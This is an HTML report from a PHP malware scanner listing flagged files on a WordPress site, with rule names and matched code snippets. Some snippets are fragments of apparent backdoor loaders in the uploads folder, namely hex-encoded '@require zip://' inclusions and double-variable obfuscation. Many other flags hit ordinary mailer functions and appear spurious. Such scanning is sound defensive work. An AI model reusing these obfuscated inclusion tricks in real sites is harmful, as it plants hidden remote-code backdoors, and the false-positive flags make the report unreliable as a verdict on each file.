<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_194").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/uploads/2021/04/04/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 377.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:43</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_195" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$FMEN</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@require_once </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x6a\x70\x67\x5f\x36\x39\x37\x38\x37\x31\x39\x62\x30\x33\x33\x33\x31\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x31\x39\x62\x30\x33\x33\x33\x31\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">require_once </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_195").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/uploads/2021/04/04/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 428.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:43</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_196" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$FMEN</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_196").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/uploads/ithemes-security/ithemes-security/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 370.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:42</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:42</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_197" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$Tgs</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@require </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x6d\x33\x75\x5f\x36\x39\x37\x38\x37\x31\x39\x61\x38\x34\x36\x30\x30\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x31\x39\x61\x38\x34\x36\x30\x30\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">require </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_197").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/uploads/ithemes-security/ithemes-security/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 418.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:42</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:42</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_198" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$Tgs</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_198").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/JjsFlxbpHR4.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:31:29</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_199" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
